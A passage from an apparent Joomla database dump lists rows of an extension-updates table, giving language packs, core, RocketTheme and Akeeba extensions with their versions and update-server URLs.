US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15870,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15871,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15872,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15873,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.8','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15874,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15875,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15876,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15877,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15878,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15879,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15880,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15881,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15882,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15883,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15884,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15885,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15886,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15887,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15888,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15889,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15890,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15891,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15892,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15893,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15894,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15895,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(15896,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(15897,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(15898,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(15899,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(15900,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(15901,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(15902,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(15903,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15904,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15905,57,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15906,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15907,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15908,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15909,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15910,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15911,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15912,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15913,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15914,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15915,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15916,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15917,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15918,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15919,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.2','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15920,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15921,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15922,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15923,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15924,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15925,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15926,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15927,57,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15928,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15929,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15930,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15931,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.8','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15932,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15933,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15934,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15935,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15936,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15937,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15938,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15939,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15940,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15941,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15942,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15943,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15944,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15945,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15946,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15947,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15948,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15949,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15950,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15951,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15952,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(15953,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.12','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-12.html\n				',''),(15955,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(15956,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-4.html\n				',''),(15958,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15959,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15960,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(15961,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15962,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15963,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15964,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15965,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(15966,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15967,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15968,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15969,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15970,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15971,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15972,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15973,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15974,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15975,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15976,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15977,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15978,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15979,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15980,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15981,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15982,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15983,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15984,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15985,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15986,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15987,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15988,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15989,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15990,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15991,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15992,3,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15993,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15994,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15995,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15996,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15997,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15998,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15999,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16000,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16001,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16002,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16003,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16004,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16005,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16006,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16007,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16008,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16009,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16010,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16011,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16012,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16013,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16014,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16015,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16016,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16017,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16018,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(16019,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(16020,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(16021,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(16022,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(16023,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(16024,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(16025,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(16026,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16027,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16028,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16029,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16030,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16031,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16032,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16033,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16034,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16035,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16036,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16037,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16038,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16039,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16040,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16041,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16042,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16043,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16044,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16045,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16046,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16047,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16048,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16049,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16050,57,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16051,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16052,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16053,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16054,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16055,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16056,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16057,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16058,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16059,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16060,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16061,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16062,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16063,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16064,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16065,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16066,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16067,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16068,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16069,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16070,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16071,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16072,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16073,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16074,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16075,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16076,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.12','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-12.html\n				',''),(16077,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(16078,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-4.html\n				',''),(16080,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16081,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				